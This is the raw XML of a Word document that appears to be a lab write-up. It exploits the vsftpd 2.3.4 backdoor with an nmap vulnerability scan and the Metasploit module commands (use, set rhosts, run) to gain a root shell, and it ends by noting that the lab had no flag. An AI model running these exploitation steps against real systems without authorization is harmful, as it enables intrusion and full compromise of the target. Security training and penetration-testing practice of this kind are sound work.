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EFDFE" w14:textId="43A79B98" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:t>Start a basic nmap scan, revealing an ftp server open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEE9824" w14:textId="5763D979" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:t>Version is vsftpd 234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AD3D40" w14:textId="78C75684" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1498F504" wp14:editId="764AD63B">
            <wp:extent cx="5939155" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="36481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28A9" w14:textId="47B4D66E" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:t>Run command;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CB05E" w14:textId="55654237" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:t>Nmap –script vuln ip.add.re.ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23238CCE" w14:textId="00AA1667" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:t>To see if it’s vulnerable to anything in particular, which reveals a backdoor vuln.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C19A105" w14:textId="6F7C5A17" w:rsidR="007B35D5" w:rsidRDefault="007B35D5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CD06A5E" wp14:editId="2894CCAA">
            <wp:extent cx="5939155" cy="2656205"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="1055082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D15A" w14:textId="18330D62" w:rsidR="007B35D5" w:rsidRDefault="0030399A">
      <w:r>
        <w:t>Search Metasploit for anything dealing with vsftpd, below, we can see the version 2.3.4 in the description of the underlined module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6534E" w14:textId="422FC6DC" w:rsidR="0030399A" w:rsidRDefault="0030399A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07142B5D" wp14:editId="17D0D95F">
            <wp:extent cx="5930265" cy="1506855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35451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ED83" w14:textId="719E8235" w:rsidR="007B35D5" w:rsidRDefault="00552267">
      <w:r>
        <w:t>Setting up and running the module opens up a command line session for us</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7247C0" w14:textId="0C182FDE" w:rsidR="00552267" w:rsidRDefault="00552267">
      <w:r>
        <w:t xml:space="preserve">Use exploit/unix/ftp/vftpd-234_backdoor </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869FA9E" w14:textId="22B8B1A7" w:rsidR="00552267" w:rsidRDefault="00552267">
      <w:r>
        <w:t>Set rhosts ip.add.re.ss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9D060" w14:textId="12DC0DE7" w:rsidR="00552267" w:rsidRDefault="00552267">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB6A32E" w14:textId="26D03DC9" w:rsidR="007B35D5" w:rsidRDefault="00552267">
      <w:r>
        <w:t>Command line session then opens.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="685EB6EF" wp14:editId="0DF96592">
            <wp:extent cx="5939155" cy="3300730"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="582554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 devs didn’t make a flag for this lab, just showing you’re root in the root directory was the win condition here.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="007B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D5"/>
    <w:rsid w:val="002549AC"/>
    <w:rsid w:val="0030399A"/>
    <w:rsid w:val="00552267"/>
    <w:rsid w:val="007B35D5"/>
    <w:rsid w:val="00807B34"/>
    <w:rsid w:val="0082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52F9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1A997D5A-FF84-4E4F-A377-AF9FA137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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-09T01:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-11T01:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>